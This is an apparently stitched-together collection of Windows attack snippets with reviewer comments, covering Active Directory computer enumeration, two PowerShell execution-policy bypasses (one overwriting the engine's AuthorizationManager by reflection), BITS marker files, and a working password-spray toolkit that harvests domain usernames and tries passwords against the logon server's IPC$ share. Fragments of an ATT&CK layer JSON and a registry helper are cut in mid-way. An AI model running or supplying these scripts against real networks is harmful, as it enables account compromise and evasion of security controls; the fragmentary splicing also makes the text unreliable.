rem Counts the computer objects in the machine's own AD domain. Builds an LDAP path from the
rem domain name (each label becomes a DC= component), runs a DirectorySearcher with the filter
rem (objectCategory=computer) and prints the size of FindAll().
rem Result codes: -1 when the host is not domain-joined, -2 when the search throws (lookup or
rem DC errors land in the catch), otherwise the object count.
rem NOTE(review): -ep bypass only overrides execution policy for this one process; execution
rem policy is a safety setting, not a security boundary, so the flag does not elevate anything.
powershell -ep bypass -command "$s=gwmi Win32_ComputerSystem; if (-not $s.PartOfDomain) { $n=-1 } else { $dr='LDAP://';$s.Domain.Split('.') | % { $dr+='DC='+$_+',' }; $dr=$dr.TrimEnd(','); try { $ad=New-Object DirectoryServices.DirectorySearcher(([adsi]$dr),'(objectCategory=computer)',('name')); $n=($ad.FindAll()).Count } catch { $n=-2} };write-host " Hosts count: " $n; "
# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

# Replaces the current runspace's AuthorizationManager with a plain base-class instance.
# It reaches the private _context field of $executioncontext through reflection, then
# overwrites that context's private _authorizationManager field. The base
# AuthorizationManager does not enforce any policy, so script execution checks for this
# session stop consulting the configured execution policy.
# Scope: the current process only - no registry or file on disk is modified.
# NOTE(review): this depends on non-public engine internals (field names and types), so it
# may stop working on a different PowerShell version without any error other than a
# reflection exception.
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}

Disable-ExecutionPolicy
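rem Writes a marker file to the user's desktop so it can be verified that a BITS job ran.
rem USERPROFILE is an absolute path. HOMEPATH has no drive letter, so the original command
rem resolved the desktop against whatever the current drive happened to be and could miss
rem the real profile. The PowerShell variant of this marker already uses USERPROFILE.
rem The literal quotes and the space before the redirect are no longer written into the file.
echo Bits Job Executed>"%USERPROFILE%\Desktop\bitsjob.txt"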
# Appends one marker line to the user's desktop so a BITS job can be seen to have run.
# The file is created if it does not exist and appended to otherwise.
$markerPath = Join-Path $env:USERPROFILE 'desktop\bitsjob.txt'
'Bits job executed' | Add-Content -Path $markerPath
| { | |
| "name": "AzureCloudBrainStorming", | |
| "version": "3.0", | |
| "domain": "mitre-enterprise", | |
| "description": "", | |
| "filters": { | |
| "stages": [ | |
| "act" | |
| ], | |
| "platforms": [ |
| function setKey($registryPath, $Name, $Value, $Type="DWORD") { | |
| IF(!(Test-Path $registryPath)) | |
| { | |
| New-Item -Path $registryPath -Force | Out-Null | |
| New-ItemProperty -Path $registryPath -Name $Name -Value $value -PropertyType $Type -Force | Out-Null | |
| } |
rem Builds TEMP\users.txt from the output of "net users /domain":
rem   1. skip the six header lines and drop the "The command c..." footer, then collapse the
rem      spaces between the three name columns into commas (TEMP\1.txt);
rem   2. squeeze the remaining ", " separators into a single comma (TEMP\2.txt);
rem   3. split each row on commas into up to three names, one per line (TEMP\3.txt);
rem   4. remove the "ECHO is on." lines that echo emits for an empty column (users.txt).
rem NOTE(review): the single-percent loop variables (a, n, o, p) are the interactive-prompt
rem form. Inside a .bat file they must be doubled, as the SETLOCAL variant of this snippet does.
rem Create the users.txt by parsing the "net users /domain" output
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
rem Reset the command window title so you can see the progress of the password spray in the title
title Command Prompt
rem Set your password for the spray here
rem NOTE(review): the loop that consumes this variable is not part of this excerpt; a single
rem hard-coded password tried against every account in users.txt is exactly the pattern that
rem account-lockout thresholds and domain-controller logon auditing are designed to surface.
set password=Spring2020
rem Interactive-prompt version of the users.txt builder (single-percent loop variables).
rem Parses "net users /domain" (six header lines and the "The command c..." footer removed),
rem turns the three-column listing into one name per line via TEMP\1.txt, 2.txt and 3.txt,
rem and filters out the "ECHO is on." lines produced for empty columns. Stale temp files are
rem removed first so a previous run cannot leak names into the new list.
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
rem Batch-file version of the users.txt builder: loop variables are doubled as a .bat requires.
rem Same pipeline as the interactive variant - strip the "net users /domain" header and footer,
rem collapse the three name columns to one name per line through TEMP\1.txt, 2.txt and 3.txt,
rem and drop the "ECHO is on." lines that empty columns produce.
rem NOTE(review): delayed expansion is enabled but never used (the lines rely on "call echo"
rem instead of !line!). With it on, any "!" in a listed account name would be stripped when
rem the line is echoed, so the option looks like a leftover and could be removed.
SETLOCAL EnableDelayedExpansion
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %%a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%%a & @call echo %%line: =,%% >> %temp%\1.txt
@FOR /F "delims=" %%a in (%temp%\1.txt) do @set line=%%a & @call echo %%line:, =,%% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %%n in (%temp%\2.txt) do @echo %%n >> %temp%\3.txt & @echo %%o >> %temp%\3.txt & @echo %%p >> %temp%\3.txt
@FOR /F "tokens=*" %%a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %%a >> %temp%\users.txt
rem Password-spray loop, interactive-prompt form (single-percent variables). For every line
rem of pass.txt the inner loop attempts to map the logon server's IPC$ share as
rem USERDOMAIN\user with that password for every line of users.txt; a successful mapping
rem prints "[*] user:password" and the session is disconnected immediately afterwards.
rem NOTE(review): every iteration is a real authentication against the logon server, so one
rem outer iteration is one password tried across the whole account list - the pattern that
rem account-lockout thresholds and domain-controller logon auditing exist to catch.
@FOR /F "delims=" %p in (pass.txt) DO @FOR /F "delims=" %n in (users.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "%p" 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete %logonserver%\IPC$ > NUL